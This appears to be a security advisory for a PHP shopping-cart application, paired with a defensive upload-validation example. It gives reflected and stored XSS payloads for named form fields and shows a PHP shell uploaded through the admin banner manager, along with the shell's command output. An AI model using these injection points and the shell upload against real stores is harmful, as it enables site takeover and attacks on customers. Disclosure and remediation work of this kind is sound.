REFLECTED CROSS-SITE SCRIPTING (XSS)

http://[host]/index.php?main_page=shopping_cart
(OR)
Your Shopping Cart Contents =>
Qty: "><script>alert("XSS")</script>

STORED CROSS-SITE SCRIPTING (XSS)

http://[host]/[admin]/zones.php?page=1&action=new
(OR)
Locations/Taxes => Zones
Zones Name: "><script>alert("XSS")</script>
Zones Code: "><script>alert("XSS")</script>

ARBITRARY FILE UPLOAD

http://[host]/[admin]/banner_manager.php?action=new
(OR)
Tools => Banner Manager => New Banner =>
Image: phpShell.php

The uploaded file will be located at:
http://[host]/images/phpShell.php

uid=33(www-data) gid=33(www-data) groups=33(www-data)
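
For the arbitrary file upload above, one way to validate a banner image on the server side. This is an added example, not the application's own code; the function names, the allow-list and the destination directory are assumptions.

```php
<?php
// Added example: not the application's own code. Function names, the
// allow-list and the destination directory are assumptions.
const BANNER_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Return the extension to store the file under, or null to reject it.
// The decision uses the file content only; the client-supplied name
// (e.g. "phpShell.php") and Content-Type header are never consulted.
function banner_extension(string $tmpPath): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(BANNER_TYPES[$mime])) {
        return null;
    }
    // The file must also parse as an image.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    return BANNER_TYPES[$mime];
}

// Store an accepted upload under a server-generated name, so the stored
// file never carries a .php extension. $upload is one $_FILES entry.
function store_banner(array $upload, string $destDir): ?string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        return null;
    }
    $ext = banner_extension($upload['tmp_name']);
    if ($ext === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($upload['tmp_name'], "$destDir/$name") ? $name : null;
}

// Constructed sample inputs: a PHP script and a 1x1 GIF.
$samples = [
    'phpShell.php' => "<?php echo 1; ?>",
    'banner.gif'   => base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'),
];
foreach ($samples as $clientName => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'bn');
    file_put_contents($tmp, $bytes);
    printf("%-13s => %s\n", $clientName, banner_extension($tmp) ?? 'rejected');
    unlink($tmp);
}
```

A file that is both a valid image and contains script text passes the content checks, so the server-generated name matters, and the images directory should also be configured so the web server does not execute scripts from it.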